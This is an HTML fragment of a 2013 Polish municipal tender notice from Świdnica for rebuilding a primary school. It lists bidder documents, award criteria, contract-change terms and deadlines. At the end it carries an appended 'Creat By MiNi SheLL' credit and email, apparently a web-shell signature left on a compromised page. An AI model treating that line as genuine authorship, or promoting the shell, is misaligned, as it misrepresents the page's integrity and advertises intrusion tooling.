<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-zaparafowany projekt umowy - załącznik nr 13 do oferty Wykonawcy,
-dowód wniesienia wadium - załącznik nr 14 do oferty Wykonawcy,
-pełnomocnictwo do podpisania oferty  w przypadku, gdy ofertę podpisuje osoba (osoby nie wskazane w dokumencie rejestrowym) upoważniona do składania oświadczeń woli przez Wykonawcę  - załącznik nr  15 do oferty Wykonawcy,
-pełnomocnictwo dla pełnomocnika składającego ofertę w ramach oferty wspólnej - załącznik nr 16 do oferty Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany umowy w formie pisemnej - aneksem zaakceptowanym przez obie strony w następujących przypadkach:
a.jeżeli zmiana umowy jest korzystna dla Zamawiającego (korzyść ekonomiczna, techniczna, eksploatacyjna),
b.jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia,
c.zmiany stawki podatku VAT.
Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
-zawieszenia robót przez Zamawiającego;
-wystąpienia siły wyższej, przy czym za siłę wyższą uznaje się zdarzenie nagłe, nadzwyczajne, zewnętrzne i niemożliwe do przewidzenia, którego nie udało się uniknąć nawet w wypadku najwyższej staranności stron;
-zmian zakresu robót, w związku ze zmianą technologii dokonanych na wniosek Zamawiającego;
-zmian dokumentacji projektowej, dokonanych na wniosek Zamawiającego lub zaakceptowanych przez Zamawiającego.
-zmiany harmonogramu rzeczowo-finansowego realizacji dokonanych na wniosek Zamawiającego,  jeżeli zaistnienie w/w zdarzeń będzie miało wpływ na terminowe wykonanie przedmiotu umowy.
Zamawiający może dokonać zmiany wynagrodzenia Wykonawcy w przypadku wystąpienia robót nieprzewidzianych w specyfikacji technicznej wykonania i odbioru robót i projekcie, których realizacja warunkuje prawidłowe wykonanie przedmiotu umowy. Podstawę zmiany wynagrodzenia będzie stanowić kalkulacja Wykonawcy pozytywnie zweryfikowana przez Inspektora nadzoru i Zamawiającego.
Wykonawca może dokonać zmian osób, pełniących funkcje kierownicze na budowie z zachowaniem właściwych kwalifikacji zawodowych.
Zmiany w umowie mogą być dopuszczone wyłącznie pod warunkiem podpisania aneksu przez dwie strony umowy.
Zmiana umowy może nastąpić na wniosek Wykonawcy po akceptacji Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów pok. 124, I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.11.2013 godzina 09:00, miejsce: Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów pok. 124, I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotowe zamówienie obejmuje zakres robót budowlanych realizowanych w ramach Projektu pn.: Przebudowa Szkoły Podstawowej nr 8 przy ul. Wałbrzyskiej 39 w Świdnicy - modernizacja obiektów dydaktycznych na terenie powojskowym - etap I, który został złożony przez Inwestora - tj. Gminę Miasto Świdnica do Urzędu Marszałkowskiego Województwa Dolnośląskiego w celu pozyskanie dofinansowania   ze środków pomocowych na realizację inwestycji w ramach RPO dla Województwa Dolnośląskiego Działaninr 9.1 Odnowa zdegradowanych obszarów miejskich w miastach powyżej 10 tysięcy mieszkańców..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com